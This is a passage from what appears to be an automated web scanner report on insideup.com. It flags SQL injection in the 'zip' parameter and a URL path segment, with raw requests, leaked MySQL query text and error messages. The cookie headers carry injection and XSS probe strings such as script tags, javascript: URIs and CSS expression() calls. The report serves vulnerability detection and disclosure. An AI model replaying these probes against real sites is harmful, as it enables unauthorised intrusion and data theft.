GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:03:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ketaqgeeofk10fdbkohdlvljo7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.303. http://www.insideup.com/ppc/leadflow/fist00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:03:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=to37amisja3bdjrbubhjdlcq95; path=/
Content-Length: 6510
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_' at line 5

Request 2

GET /ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_452%5B%5D=2936__Financial+statement+creation&attributeId_453=2944__No+-+No+preference&attributeId_454=2948__Not+sure&attributeId_455=2955__ASAP&attributeId_456=2961__Still+in+the+planning+stages&attributeId_457=2968__Less+than+%24100%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=10003&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:03:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pn7l8faal4kgcqknvj046mcff6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.304. http://www.insideup.com/ppc/leadflow/fist00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/fist00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/fist00/project.php?catId=10003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:40:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v1tk2kfbmnu9eqkp9uo0egb747; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow'/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow'/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow'/fist0' at line 5

Request 2

